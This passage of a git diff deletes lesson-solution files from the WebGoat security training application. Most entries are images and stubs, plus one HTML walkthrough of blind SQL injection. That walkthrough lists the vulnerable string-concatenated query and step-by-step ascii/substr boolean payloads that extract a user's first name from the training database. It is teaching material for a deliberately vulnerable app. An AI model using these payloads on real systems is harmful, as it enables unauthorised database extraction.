deleted file mode 100644
index 3a463c317..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg
deleted file mode 100644
index 32f9278c2..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg
deleted file mode 100644
index 1ab696dcd..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
deleted file mode 100644
index 5ad40b6cd..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
+++ /dev/null
@@ -1,904 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Blind SQL Injection
-
-
-
-
Concept / Topic To Teach:
-
-
SQL injection
-attacks represent a serious threat to any database-driven site. The methods behind
-an attack are easy to learn and the damage caused can range from considerable
-to complete system compromise. Despite these risks an incredible number of
-systems on the internet are susceptible to this form of attack.
-
-
-
-
Not only is
-it a threat easily instigated, it is also a threat that, with a little
-common-sense and forethought, can be almost totally prevented. This lesson will
-show the student several examples of SQL injection.
-
-
-
-
It is always
-good practice to sanitize all input data, especially data that will used in OS
-command, scripts, and database queries.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to view all records in the specified table.The user could add new records or modify
-existing records.
-
-
-
-
From the hints J
-
-
Compound SQL
-statements can be made by joining multiple tests with keywords like AND and OR.
-Create a SQL statement that you can use as a true/false test and then select
-the first character of the target element and do a start narrowing down the
-character using > and <
-
-
-
-
The backend
-database is HSQLDB. Keep that in mind if you research SQL functions
-on the Internet since different databases use some different functions and
-syntax.
-
-
This is the
-code for the query being built and issued by WebGoat:
-
-
-
-
"SELECT
-* FROM user_data WHERE userid = " + accountNumber
-
-
The
-application is taking your input and inserting it at the end of a pre-formed
-SQL command. You will need to make use of the following SQL functions:
-
-
-
-
SELECT -
-query for your target data and get a string
-
-
-
-
substr(string,
-start, length) - returns a substring of string starting at the start character
-and going for length characters
-
-
-
-
ascii(string)
-will return the ascii value of the first character in string
-
-
-
-
> and <
-- once you have a character's value, compare it to a choosen one
-
-
Example: is
-the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
-
-
-
-
-
101 AND (ascii(
-substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 );
-
-
-
-
-
If you get
-back that account number is valid, then yes. If get back that the number
-is invalid then answer is no.
-
-
Another
-example: is the second character of the first_name of userid 15613 greater than
-'m' (ascii 109)?
-
-
-
-
101 AND (ascii(
-substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109
-);
-
-
-
-
If you get back
-that account number is valid, then yes. If get back that the number is invalid
-then answer is no.
-
-
-
-
-
-
Figure 1 Lesson 16
-
-
For the
-query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613)
-, 1 , 1) ) < 77 ); you will get a "Account number is valid". If the
-character is bigger then the value you get an invalid account error message.
-
-
-
-
-
-
Figure 2 Invalid account number
-
-
-
-
You can
-change the < to = to make sure that you have the correct value.
-
-
This results
-in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 1 , 1) ) = 74 );
-
-
-
-
-
-
Figure 3 First character
-
-
-
-
So you know
-that ascii(74) is capital J. Now do the same for the second and all other
-characters.
-
-
-
-
-
-
-
-
The query for
-the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 2 , 1) ) = 111 );
-
-
Ascii(111) =
-o, so you have now Jo.
-
-
-
-
-
-
-
-
For the third
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e
-
-
For the
-fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s
-
-
For the fifth
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 5 , 1) ) = 112); Ascii(112) = p
-
-
For the sixth
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 6 , 1) ) = 104); Ascii(104) = h
-
-
-
-
So the name
-that you found is Joesph. Enter this in the text field to complete this lesson.
-
-
-
-
-
-
Figure 4 Enter the name Joesph
-
-
-
-
-
-
Figure 5 Lesson 16 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
deleted file mode 100644
index 085ceea56..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png
deleted file mode 100644
index 5fef4d85b..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png
deleted file mode 100644
index 950942ed9..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png
deleted file mode 100644
index 8c3ee5181..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png
deleted file mode 100644
index 54ea1bcb2..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png
deleted file mode 100644
index 3668266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png
deleted file mode 100644
index 9987542b3..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg
deleted file mode 100644
index f5c8d4841..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg
deleted file mode 100644
index 68702bb41..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg
deleted file mode 100644
index b6e84a5fe..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg
deleted file mode 100644
index 93a58e837..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg
deleted file mode 100644
index 6055cba63..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg
deleted file mode 100644
index 2e2bf3fc5..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg
deleted file mode 100644
index b7b54355c..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg
deleted file mode 100644
index 716f2aad9..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml b/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
deleted file mode 100644
index 7f94019c7..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image001.png b/src/main/webapp/lesson_solutions/CSRF_files/image001.png
deleted file mode 100644
index 9d82bd95a..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image003.png b/src/main/webapp/lesson_solutions/CSRF_files/image003.png
deleted file mode 100644
index 2189df262..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image005.png b/src/main/webapp/lesson_solutions/CSRF_files/image005.png
deleted file mode 100644
index 95949f62b..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image007.png b/src/main/webapp/lesson_solutions/CSRF_files/image007.png
deleted file mode 100644
index 7bf06a985..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image009.png b/src/main/webapp/lesson_solutions/CSRF_files/image009.png
deleted file mode 100644
index d0e2f233c..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg
deleted file mode 100644
index fbb254bd8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg
deleted file mode 100644
index 32dbb3c02..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg
deleted file mode 100644
index 8d76909d8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg
deleted file mode 100644
index be9c8e294..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg
deleted file mode 100644
index ef71f6923..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx b/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg b/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg
deleted file mode 100644
index e51a40ad0..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png b/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png
deleted file mode 100644
index e8f391339..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
deleted file mode 100644
index c778dd663..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png
deleted file mode 100644
index 95185ac08..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png
deleted file mode 100644
index bb6e1e518..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png
deleted file mode 100644
index 9c7ecd242..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg
deleted file mode 100644
index d82452e33..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg
deleted file mode 100644
index 67162e723..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg
deleted file mode 100644
index 916c6fdc1..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg
deleted file mode 100644
index 408d75d35..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg
deleted file mode 100644
index 455c17580..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg
deleted file mode 100644
index ef1515bd6..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png
deleted file mode 100644
index 3971e484f..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png
deleted file mode 100644
index 48e299a23..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png
deleted file mode 100644
index df21320e8..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png
deleted file mode 100644
index b44361734..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png
deleted file mode 100644
index 7f0518029..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png
deleted file mode 100644
index 6257299d0..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png
deleted file mode 100644
index 42f27f677..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png
deleted file mode 100644
index 8e2b1503e..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png
deleted file mode 100644
index e09a7fc57..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png
deleted file mode 100644
index 5c6927667..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
deleted file mode 100644
index 44904329e..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png
deleted file mode 100644
index 8d3b529b0..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg
deleted file mode 100644
index 3f3bccdf5..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png
deleted file mode 100644
index 9effd17b9..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg
deleted file mode 100644
index 016c16e12..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png
deleted file mode 100644
index 844b00d92..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg
deleted file mode 100644
index c3349b050..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png
deleted file mode 100644
index d0b0aec8e..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg
deleted file mode 100644
index 18a4764fe..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg
deleted file mode 100644
index 1112e63f7..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png
deleted file mode 100644
index d1021bceb..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg
deleted file mode 100644
index e9bc078c3..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png
deleted file mode 100644
index efe585a32..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg
deleted file mode 100644
index dd8bf4ac4..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db b/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db
deleted file mode 100644
index 550da4fb2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg
deleted file mode 100644
index c62bcbd94..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg
deleted file mode 100644
index 77ce23c41..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg
deleted file mode 100644
index ce288a551..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg
deleted file mode 100644
index 6ae8cdfda..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
deleted file mode 100644
index 065d671e4..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png
deleted file mode 100644
index dc2669fe2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg
deleted file mode 100644
index 6f5c75387..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png
deleted file mode 100644
index 45396104d..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg
deleted file mode 100644
index 372cdca56..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
